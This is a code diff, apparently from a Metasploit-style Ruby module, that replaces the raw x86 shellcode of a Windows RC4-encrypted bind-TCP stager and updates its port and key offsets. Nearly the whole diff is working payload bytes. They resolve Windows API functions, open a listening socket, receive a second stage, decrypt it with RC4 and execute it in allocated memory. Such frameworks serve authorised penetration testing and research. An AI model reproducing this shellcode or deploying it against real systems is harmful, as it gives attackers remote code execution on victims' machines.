@@ -33,43 +33,36 @@ def initialize(info = {})
3333 'RequiresMidstager' => false ,
3434 'Offsets' =>
3535 {
36- 'LPORT' => [ 197 , 'n' ] ,
37- 'XORKey' => [ 257 , '' ] ,
38- 'RC4Key' => [ 321 , '' ]
36+ 'LPORT' => [ 192 , 'n' ] ,
37+ 'XORKey' => [ 249 , '' ] ,
38+ 'RC4Key' => [ 311 , '' ]
3939 } ,
4040 'Payload' =>
41-
42- # Name: stager_bind_tcp_rc4
43- # Length: 408 bytes
44- # Port Offset: 197
45- # RC4Key Offset: 321
46- # XORKey Offset: 257
47- "\xFC \xE8 \x86 \x00 \x00 \x00 \x60 \x89 \xE5 \x31 \xD2 \x64 \x8B \x52 \x30 \x8B " +
48- "\x52 \x0C \x8B \x52 \x14 \x8B \x72 \x28 \x0F \xB7 \x4A \x26 \x31 \xFF \x31 \xC0 " +
49- "\xAC \x3C \x61 \x7C \x02 \x2C \x20 \xC1 \xCF \x0D \x01 \xC7 \xE2 \xF0 \x52 \x57 " +
50- "\x8B \x52 \x10 \x8B \x42 \x3C \x8B \x4C \x10 \x78 \xE3 \x4A \x01 \xD1 \x51 \x8B " +
51- "\x59 \x20 \x01 \xD3 \x8B \x49 \x18 \xE3 \x3C \x49 \x8B \x34 \x8B \x01 \xD6 \x31 " +
52- "\xFF \x31 \xC0 \xAC \xC1 \xCF \x0D \x01 \xC7 \x38 \xE0 \x75 \xF4 \x03 \x7D \xF8 " +
53- "\x3B \x7D \x24 \x75 \xE2 \x58 \x8B \x58 \x24 \x01 \xD3 \x66 \x8B \x0C \x4B \x8B " +
54- "\x58 \x1C \x01 \xD3 \x8B \x04 \x8B \x01 \xD0 \x89 \x44 \x24 \x24 \x5B \x5B \x61 " +
55- "\x59 \x5A \x51 \xFF \xE0 \x58 \x5F \x5A \x8B \x12 \xEB \x89 \x5D \x68 \x33 \x32 " +
56- "\x00 \x00 \x68 \x77 \x73 \x32 \x5F \x54 \x68 \x4C \x77 \x26 \x07 \xFF \xD5 \xB8 " +
57- "\x90 \x01 \x00 \x00 \x29 \xC4 \x54 \x50 \x68 \x29 \x80 \x6B \x00 \xFF \xD5 \x50 " +
58- "\x50 \x50 \x50 \x40 \x50 \x40 \x50 \x68 \xEA \x0F \xDF \xE0 \xFF \xD5 \x97 \x31 " +
59- "\xDB \x53 \x68 \x02 \x00 \x11 \x5C \x89 \xE6 \x6A \x10 \x56 \x57 \x68 \xC2 \xDB " +
60- "\x37 \x67 \xFF \xD5 \x53 \x57 \x68 \xB7 \xE9 \x38 \xFF \xFF \xD5 \x53 \x53 \x57 " +
61- "\x68 \x74 \xEC \x3B \xE1 \xFF \xD5 \x57 \x97 \x68 \x75 \x6E \x4D \x61 \xFF \xD5 " +
62- "\x6A \x00 \x6A \x04 \x56 \x57 \x68 \x02 \xD9 \xC8 \x5F \xFF \xD5 \x8B \x36 \x81 " +
63- "\xF6 \x58 \x4F \x52 \x4B \x8D \x0E \x6A \x40 \x68 \x00 \x10 \x00 \x00 \x51 \x6A " +
64- "\x00 \x68 \x58 \xA4 \x53 \xE5 \xFF \xD5 \x8D \x98 \x00 \x01 \x00 \x00 \x53 \x56 " +
65- "\x50 \x6A \x00 \x56 \x53 \x57 \x68 \x02 \xD9 \xC8 \x5F \xFF \xD5 \x01 \xC3 \x29 " +
66- "\xC6 \x85 \xF6 \x75 \xEC \x5B \x59 \x5D \x55 \x57 \x89 \xDF \xE8 \x10 \x00 \x00 " +
67- "\x00 \x52 \x43 \x34 \x4B \x65 \x79 \x4D \x65 \x74 \x61 \x73 \x70 \x6C \x6F \x69 " +
68- "\x74 \x5E \x31 \xC0 \xAA \xFE \xC0 \x75 \xFB \x81 \xEF \x00 \x01 \x00 \x00 \x31 " +
69- "\xDB \x02 \x1C \x07 \x89 \xC2 \x80 \xE2 \x0F \x02 \x1C \x16 \x8A \x14 \x07 \x86 " +
70- "\x14 \x1F \x88 \x14 \x07 \xFE \xC0 \x75 \xE8 \x31 \xDB \xFE \xC0 \x02 \x1C \x07 " +
71- "\x8A \x14 \x07 \x86 \x14 \x1F \x88 \x14 \x07 \x02 \x14 \x1F \x8A \x14 \x17 \x30 " +
72- "\x55 \x00 \x45 \x49 \x75 \xE5 \x5F \xC3 "
41+ "\xFC \xE8 \x82 \x00 \x00 \x00 \x60 \x89 \xE5 \x31 \xC0 \x64 \x8B \x50 \x30 \x8B " +
42+ "\x52 \x0C \x8B \x52 \x14 \x8B \x72 \x28 \x0F \xB7 \x4A \x26 \x31 \xFF \xAC \x3C " +
43+ "\x61 \x7C \x02 \x2C \x20 \xC1 \xCF \x0D \x01 \xC7 \xE2 \xF2 \x52 \x57 \x8B \x52 " +
44+ "\x10 \x8B \x4A \x3C \x8B \x4C \x11 \x78 \xE3 \x48 \x01 \xD1 \x51 \x8B \x59 \x20 " +
45+ "\x01 \xD3 \x8B \x49 \x18 \xE3 \x3A \x49 \x8B \x34 \x8B \x01 \xD6 \x31 \xFF \xAC " +
46+ "\xC1 \xCF \x0D \x01 \xC7 \x38 \xE0 \x75 \xF6 \x03 \x7D \xF8 \x3B \x7D \x24 \x75 " +
47+ "\xE4 \x58 \x8B \x58 \x24 \x01 \xD3 \x66 \x8B \x0C \x4B \x8B \x58 \x1C \x01 \xD3 " +
48+ "\x8B \x04 \x8B \x01 \xD0 \x89 \x44 \x24 \x24 \x5B \x5B \x61 \x59 \x5A \x51 \xFF " +
49+ "\xE0 \x5F \x5F \x5A \x8B \x12 \xEB \x8D \x5D \x68 \x33 \x32 \x00 \x00 \x68 \x77 " +
50+ "\x73 \x32 \x5F \x54 \x68 \x4C \x77 \x26 \x07 \xFF \xD5 \xB8 \x90 \x01 \x00 \x00 " +
51+ "\x29 \xC4 \x54 \x50 \x68 \x29 \x80 \x6B \x00 \xFF \xD5 \x6A \x08 \x59 \x50 \xE2 " +
52+ "\xFD \x40 \x50 \x40 \x50 \x68 \xEA \x0F \xDF \xE0 \xFF \xD5 \x97 \x68 \x02 \x00 " +
53+ "\x11 \x5C \x89 \xE6 \x6A \x10 \x56 \x57 \x68 \xC2 \xDB \x37 \x67 \xFF \xD5 \x57 " +
54+ "\x68 \xB7 \xE9 \x38 \xFF \xFF \xD5 \x57 \x68 \x74 \xEC \x3B \xE1 \xFF \xD5 \x57 " +
55+ "\x97 \x68 \x75 \x6E \x4D \x61 \xFF \xD5 \x6A \x00 \x6A \x04 \x56 \x57 \x68 \x02 " +
56+ "\xD9 \xC8 \x5F \xFF \xD5 \x8B \x36 \x81 \xF6 \x58 \x4F \x52 \x4B \x8D \x0E \x6A " +
57+ "\x40 \x68 \x00 \x10 \x00 \x00 \x51 \x6A \x00 \x68 \x58 \xA4 \x53 \xE5 \xFF \xD5 " +
58+ "\x8D \x98 \x00 \x01 \x00 \x00 \x53 \x56 \x50 \x6A \x00 \x56 \x53 \x57 \x68 \x02 " +
59+ "\xD9 \xC8 \x5F \xFF \xD5 \x01 \xC3 \x29 \xC6 \x75 \xEE \x5B \x59 \x5D \x55 \x57 " +
60+ "\x89 \xDF \xE8 \x10 \x00 \x00 \x00 \x52 \x43 \x34 \x4B \x65 \x79 \x4D \x65 \x74 " +
61+ "\x61 \x73 \x70 \x6C \x6F \x69 \x74 \x5E \x31 \xC0 \xAA \xFE \xC0 \x75 \xFB \x81 " +
62+ "\xEF \x00 \x01 \x00 \x00 \x31 \xDB \x02 \x1C \x07 \x89 \xC2 \x80 \xE2 \x0F \x02 " +
63+ "\x1C \x16 \x8A \x14 \x07 \x86 \x14 \x1F \x88 \x14 \x07 \xFE \xC0 \x75 \xE8 \x31 " +
64+ "\xDB \xFE \xC0 \x02 \x1C \x07 \x8A \x14 \x07 \x86 \x14 \x1F \x88 \x14 \x07 \x02 " +
65+ "\x14 \x1F \x8A \x14 \x17 \x30 \x55 \x00 \x45 \x49 \x75 \xE5 \x5F \xC3 "
7366
7467 }
7568 ) )
0 commit comments